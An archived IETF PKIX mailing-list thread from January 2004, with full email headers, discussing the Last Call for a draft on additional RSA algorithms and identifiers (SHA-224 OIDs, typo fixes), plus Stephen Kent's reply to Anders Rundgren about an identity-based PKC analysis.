Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-ietf-pkix@mail.imc.org Precedence: bulk List-Archive: <http://www.imc.org/ietf-pkix/mail-archive/> List-ID: <ietf-pkix.imc.org> List-Unsubscribe: <mailto:ietf-pkix-request@imc.org?body=unsubscribe> Burt: This is correct. I have been coordinating with Tim Polk, and the document can proceed as soon as we are sure that the algorithm will not change. Russ At 04:24 PM 1/6/2004 -0500, Kaliski, Burt wrote: >3. The [SHA224] document will not be stable until NIST finalizes its >definition of SHA-224, which is currently out for public comment. Received: from above.proper.com (localhost [127.0.0.1]) by above.proper.com (8.12.10/8.12.8) with ESMTP id i06LPtib064726 for <ietf-pkix-bks@above.proper.com>; Tue, 6 Jan 2004 13:25:55 -0800 (PST) (envelope-from owner-ietf-pkix@mail.imc.org) Received: (from majordom@localhost) by above.proper.com (8.12.10/8.12.9/Submit) id i06LPtDu064725 for ietf-pkix-bks; Tue, 6 Jan 2004 13:25:55 -0800 (PST) X-Authentication-Warning: above.proper.com: majordom set sender to owner-ietf-pkix@mail.imc.org using -f Received: from vulcan.rsasecurity.com (vulcan.rsasecurity.com [204.167.114.130]) by above.proper.com (8.12.10/8.12.8) with ESMTP id i06LPoib064718 for <ietf-pkix@imc.org>; Tue, 6 Jan 2004 13:25:54 -0800 (PST) (envelope-from BKaliski@rsasecurity.com) Received: from ebola.securitydynamics.com by vulcan.rsasecurity.com via smtpd (for mail.imc.org [208.184.76.43]) with ESMTP; Tue, 6 Jan 2004 16:25:53 -0500 Received: from sdtihq24.securid.com (localhost [127.0.0.1]) by ebola.securitydynamics.com (8.12.10/NULL) with ESMTP id i06LPF1i007301; Tue, 6 Jan 2004 16:25:15 -0500 (EST) Received: from exna00.securitydynamics.com (exna00.securitydynamics.com [10.100.8.217]) by sdtihq24.securid.com (8.12.10/8.12.9) with ESMTP id i06LPP8F023622; Tue, 6 Jan 2004 16:25:25 -0500 (EST) Received: by exna00.securitydynamics.com with Internet Mail Service (5.5.2657.72) id <W3355TDY>; Tue, 6 Jan 2004 16:25:25 -0500 Message-ID: <F504A8CEE925D411AF4A00508B8BE90A056946ED@exna07.securitydynamics.com> From: "Kaliski, Burt" <BKaliski@rsasecurity.com> To: "'wpolk@nist.gov'" <wpolk@nist.gov>, ietf-pkix@imc.org Cc: "'Stephen Kent'" <kent@bbn.com>, jimsch@exmsft.com, Jim Schaad <jimsch@nwlink.com>, Russ Housley <housley@vigilsec.com> Subject: RE: WG Last Call: Additional Algorithms for RSA cryptography Date: Tue, 6 Jan 2004 16:24:39 -0500 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2657.72) Content-Type: text/plain; charset="iso-8859-1" Sender: owner-ietf-pkix@mail.imc.org Precedence: bulk List-Archive: <http://www.imc.org/ietf-pkix/mail-archive/> List-ID: <ietf-pkix.imc.org> List-Unsubscribe: <mailto:ietf-pkix-request@imc.org?body=unsubscribe> A few comments: 1. The sha224WithRSAEncryption OID has been defined. Please update the definition on p. 13 to the following: sha224WithRSAEncryption OBJECT IDENTIFIER ::= { pkcs-1 14 } 2. Some typos: * p. 6, definition of sha224Identifier: "id-sha256" --> "id-sha224" * p. 11, Sec. 5, para 1: "SHA_224" --> "SHA-224" * p. 12, para 3: "SHA-2224" --> "SHA-224" * p. 18, ref. [SHA224]: "-00.txt" --> "-02.txt" 3. The [SHA224] document will not be stable until NIST finalizes its definition of SHA-224, which is currently out for public comment. -- Burt -----Original Message----- From: wpolk@nist.gov [mailto:wpolk@nist.gov] Sent: Tuesday, December 16, 2003 2:31 PM To: ietf-pkix@imc.org Cc: 'Stephen Kent'; jimsch@exmsft.com; Jim Schaad; Russ Housley; Kaliski, Burt Subject: WG Last Call: Additional Algorithms for RSA cryptography This message initiates working group Last Call for "Additional Algorithms and Identifiers for RSA Cryptography". As a reminder, here is the Abstract: This document supplements RFC 3279. It describes the conventions for using the RSASSA-PSS signature algorithm, the RSAES-OAEP key transport algorithm and additional one-way hash functions with the PKCS #1 version 1.5 signature algorithm in the Internet X.509 Public Key Infrastructure (PKI). Encoding formats, algorithm identifiers, and parameter formats are specified. This is a three week Last Call. That means it will close sometime on or after January 9, 2004. The schedule has been padded with an additional week in light of the holidays. ** Do not count on any further extension to Last Call!!! ** I intend to close Last Call promptly on January 9, since an S/MIME WG document is blocked on this document. The URL for this Internet-Draft is: http://www.ietf.org/internet-drafts/draft-ietf-pkix-rsa-pkalgs-01.txt Thanks, Tim Polk Received: from above.proper.com (localhost [127.0.0.1]) by above.proper.com (8.12.10/8.12.8) with ESMTP id i02Lmqib007699 for <ietf-pkix-bks@above.proper.com>; Fri, 2 Jan 2004 13:48:52 -0800 (PST) (envelope-from owner-ietf-pkix@mail.imc.org) Received: (from majordom@localhost) by above.proper.com (8.12.10/8.12.9/Submit) id i02Lmqle007698 for ietf-pkix-bks; Fri, 2 Jan 2004 13:48:52 -0800 (PST) X-Authentication-Warning: above.proper.com: majordom set sender to owner-ietf-pkix@mail.imc.org using -f Received: from aragorn.bbn.com ([128.33.0.62]) by above.proper.com (8.12.10/8.12.8) with ESMTP id i02Lmoib007690 for <ietf-pkix@imc.org>; Fri, 2 Jan 2004 13:48:51 -0800 (PST) (envelope-from kent@bbn.com) Received: from [128.89.89.75] (dhcp89-089-075.bbn.com [128.89.89.75]) by aragorn.bbn.com (8.12.7/8.12.7) with ESMTP id i02LmhM9012370; Fri, 2 Jan 2004 16:48:45 -0500 (EST) Mime-Version: 1.0 X-Sender: kent@po2.bbn.com Message-Id: <p06020408bc1b96042e8e@[128.89.89.75]> In-Reply-To: <004501c3cebe$b4db12b0$0500a8c0@arport> References: <PCEFJNAPLMIBHBMBCGJFKENPDLAA.marc.poulaud@i-solve.co.uk> <p06020404bc1653dc01c8@[128.89.89.75]> <004501c3cebe$b4db12b0$0500a8c0@arport> Date: Fri, 2 Jan 2004 16:47:26 -0500 To: "Anders Rundgren" <anders.rundgren@telia.com> From: Stephen Kent <kent@bbn.com> Subject: Re: IDPKC Cc: <ietf-pkix@imc.org> Content-Type: text/plain; charset="us-ascii" ; format="flowed" X-Scanned-By: MIMEDefang 2.28 (www . roaringpenguin . com / mimedefang) Sender: owner-ietf-pkix@mail.imc.org Precedence: bulk List-Archive: <http://www.imc.org/ietf-pkix/mail-archive/> List-ID: <ietf-pkix.imc.org> List-Unsubscribe: <mailto:ietf-pkix-request@imc.org?body=unsubscribe> At 11:21 +0100 12/30/03, Anders Rundgren wrote: >Steve, >That was a truly brilliant analysis of IDPKC! Thanks, but I had done this before when people first asked me about my views of the technology, so all I had to do was reconstruct the verbal analysis I did previously. >It would however be nice to get a similarly educated analysis of >PKI in the form you have more faith in. Like how you actually can >build shrink-wrapped, reliable, and user-friendly RP software based >on standards having the following characteristics: You have a very focused idea of what is the goal of PKI, not one that is universally shared. Moreover, I addressed limitations of IDPKC in a broad context, but the analysis you want will take a lot more effort. Unfortunately, the world is full of problems that require considerable effort to address. I work only on those for which I have clients willing to pay. Nobody is paying me to address precisely the problem you stated. So, I will not agree to take on the task. > <SNIP> > >Hoping for a better 2004 with more mutual understanding One can always hope ... Steve
- SV: Last Call: 'Internet X.509 Public Key Infrast… Stefan Santesson
- Re: Last Call: 'Internet X.509 Public Key Infrast… Anders Rundgren
- SV: Last Call: 'Internet X.509 Public Key Infrast… Stefan Santesson
- Re: Last Call: 'Internet X.509 Public Key Infrast… Anders Rundgren
- Re: Last Call: 'Qualified Certificates Profile' t… Anders Rundgren